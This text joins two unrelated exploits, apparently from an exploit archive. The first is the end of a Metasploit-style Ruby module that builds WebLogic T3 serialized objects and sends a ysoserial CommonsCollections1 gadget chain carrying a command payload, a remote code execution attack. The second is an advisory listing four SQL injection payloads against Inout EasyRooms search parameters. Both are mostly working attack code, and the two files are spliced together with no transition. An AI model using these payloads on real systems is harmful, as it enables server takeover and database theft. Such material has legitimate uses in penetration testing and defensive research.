data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
data << '71' # TC_REFERENCE
data << '007e0004' # Handle = 0x007e0004
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
data << '71' # TC_REFERENCE
data << '007e0004' # Handle = 0x007e0004
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
data << '71' # TC_REFERENCE
data << '007e0004' # Handle = 0x007e0004
data << '78' # class footer
data << '70' # TC_NULL
data << '77020000' # BLOCKDATA (2 bytes): 0x0000
data << '78' # block footer
data << 'fe010000' # ----- separator -----
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '72001d' # className (29 bytes):
data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
data << '5461626c65456e747279' # (continued)
data << '2f52658157f4f9ed' # serialVersionUID
data << '0c00007870' # remainder of object header
data << '720021' # className (33 bytes)
data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo
data << '65726e616c2e50656572496e666f' # (continued)
data << '585474f39bc908f1' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0006' # fieldCount = 6
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '5b00087061636b61676573' # 5: Array: packages
data << '740027' # TC_STRING (39 bytes)
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;
data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
data << '3b' # (continued)
data << '78' # block footer
data << '720024' # class header
data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo;
data << '65726e616c2e56657273696f6e496e666f' # (continued)
data << '972245516452463e' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0003' # fieldCount = 3
data << '5b0008' # 0: Array
data << '7061636b6167657371' # packages
data << '007e0003' # Handle = 0x00730003
data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion
data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes
data << '740002' # TC_STRING (2 bytes)
data << '5b42' # VALUE = 0x5b42 = [B
data << '78' # block footer
data << '720024' # class header
data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo
data << '6e616c2e5061636b616765496e666f' # (continued)
data << 'e6f723e7b8ae1ec9' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0008' # fieldCount = 8
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
data << '71' # TC_REFERENCE
data << '007e0005' # Handle = 0x007e0005
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
data << '71' # TC_REFERENCE
data << '007e0005' # Handle = 0x007e0005
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
data << '71' # TC_REFERENCE
data << '007e0005' # Handle = 0x007e0005
data << '78' # class footer
data << '707702000078' # block footers
data << 'fe00ff' # this cruft again. some kind of footer
data << 'fe010000' # ----- separator -----
# weblogic.rjvm.JVMID object
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '720013' # class header
data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'
data << 'dc49c23ede121e2a' # serialVersionUID
data << '0c' # EXTERNALIZABLE | BLOCKDATA
data << '0000' # fieldCount = 0 (!!!)
data << '78' # block footer
data << '70' # NULL
data << '7750' # block header (80 bytes)
data << '21' # !
data << '000000000000000000' # 9 NULL BYTES
data << '0d' # strLength = 13 bytes
#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227
data << '3030302e3030302e3030302e30' # new string = 000.000.000.0
# (must be an IP, and length isn't trivially editable)
data << '00' # \0
data << '12' # strLength = 18 bytes
#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh
data << rand_text_alphanumeric(18).unpack('H*')[0]
data << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized)
data << '000000070000' # ??? UNKNOWN ???
data << rport.to_s(16).rjust(4, '0') # callback port
data << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ???
data << 'ffffffffff' # ??? UNKNOWN ???
data << '78' # block footer
data << 'fe010000' # ----- separator -----
# weblogic.rjvm.JVMID object
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '72' # class
data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID
data << 'dc49c23ede121e2a' # serialVersionUID
data << '0c' # EXTERNALIZABLE | BLOCKDATA
data << '0000' # fieldCount = 0
data << '78' # end block
data << '70' # TC_NULL
data << '77' # block header
data << '20' # length = 32 bytes
data << '0114dc42bd071a772700' # old string = ??? UNKNOWN ???
#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS)
data << '0d' # string length = 13 bytes (NOTE: do not edit)
#data << '3234322e3231342e312e323534' # original string = 242.214.1.254
data << '3030302e3030302e3030302e30' # new string = 000.000.000.0
# (must be an IP, and length isn't trivially editable)
#data << '61863d1d' # original string = ??? UNKNOWN ???
data << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized
data << '00000000' # NULL BYTES
data << '78' # block footer
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def send_payload_objdata
# payload creation
if target.name == 'Windows'
mycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
elsif target.name == 'Unix' || target.name == 'Solaris'
mycmd = payload.encoded
end
# basic weblogic ClassTableEntry object (serialized)
# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
payload << 'fe010000' # ----- separator -----
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
payload << '73735461626c65456e747279' # (cont)
payload << '2f52658157f4f9ed' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # remaining object header
payload << '72' # class header
payload << '00025b42' # Name: 0x5b42
payload << 'acf317f8060854e0' # serialVersionUID
payload << '02' # SERIALIZABLE
payload << '0000' # fieldCount = 0
payload << '7870' # class footer
payload << '77' # block header
payload << '020000' # contents = 0x0000
payload << '78' # block footer
payload << 'fe010000' # ----- separator -----
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
payload << '73735461626c65456e747279' # (cont)
payload << '2f52658157f4f9ed' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # remaining object header
payload << '72' # class header
payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;
payload << '6563743b' # (cont)
payload << '90ce589f1073296c' # serialVersionUID
payload << '02' # SERIALIZABLE
payload << '0000' # fieldCount = 0
payload << '7870' # remaining object header
payload << '77' # block header
payload << '020000' # contents = 0x0000
payload << '78' # block footer
payload << 'fe010000' # ----- separator -----
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
payload << '73735461626c65456e747279' # (cont)
payload << '2f52658157f4f9ed' # serialVersionUID
payload << '0c' # SERIALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # block footer
payload << '72' # class header
payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector
payload << 'd9977d5b803baf01' # serialVersionUID
payload << '03' # WRITE_METHOD | SERIALIZABLE
payload << '0003' # fieldCount = 3
payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement
payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount
payload << '5b000b656c656d656e7444617461' # 2: Array: elementData
payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;
payload << '743b' # (cont)
payload << '7870' # remaining object header
payload << '77' # block header
payload << '020000' # contents = 0x0000
payload << '78' # block footer
payload << 'fe010000' # ----- separator -----
ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1",mycmd)
payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
payload << 'fe010000' # ----- separator -----
# basic weblogic ImmutableServiceContext object (serialized)
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext
payload << '7461626c6553657276696365436f6e74657874' # (cont)
payload << 'ddcba8706386f0ba' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '78' # object footer
payload << '72' # block header
payload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext
payload << '696465722e426173696353657276696365436f' # (cont)
payload << '6e74657874' # (cont)
payload << 'e4632236c5d4a71e' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # block footer
payload << '77' # block header
payload << '020600' # contents = 0x0600
payload << '7372' # class descriptor
payload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor
payload << '726e616c2e4d6574686f644465736372697074' # (cont)
payload << '6f72' # (cont)
payload << '12485a828af7f67b' # serialVersionUID
payload << '0c' # EXTERNALIZABLE | BLOCKDATA
payload << '0000' # fieldCount = 0
payload << '7870' # class footer
payload << '77' # class data
#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765
#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c
#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b
payload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized
payload << '78' # class footer
payload << '78' # block footer
# MISSING OBJECT FOOTER (0x78)
payload << 'fe00ff' # this cruft again. some kind of footer
# sets the length of the stream
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
data << payload
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...')
build_t3_request_object
print_status('Sending client object payload...')
send_payload_objdata
handler
disconnect
end
end
# Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection
# Date: 29.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/
# Demo Site: http://inout-easyrooms.demo.inoutscripts.net/
# Version: v1.0
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/search/rentals
Vulnerable Parameter: guests (POST)
Payload: guests=-1' OR 3*2*1=6 AND 00046=00046 --
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: location (POST)
Payload: location=-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'='
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: numguest (POST)
Payload: numguest=-1' OR 3*2*1=6 AND 000232=000232 --
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: property1 (POST)
Payload:
property1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/